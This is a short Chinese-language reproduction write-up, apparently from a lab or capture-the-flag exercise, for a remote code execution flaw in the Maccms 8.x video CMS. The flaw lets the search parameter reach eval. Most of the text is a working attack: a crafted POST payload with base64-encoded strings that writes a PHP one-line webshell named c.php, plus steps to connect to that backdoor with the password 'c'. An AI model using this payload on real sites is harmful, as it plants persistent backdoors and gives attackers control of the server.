一、漏洞简介

魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等)，完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句。

二、漏洞影响

Maccms8.x

三、漏洞复现

1、访问特定URLhttp://ip:port/index.php?m=vod-search

2、开启抓包

修改一：

改为POST请求

修改二：

添加POST提交的数据 上传一句话木马

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

3、 访问页面测试是否上传成功 c.php密码c

4、链接后门获取flag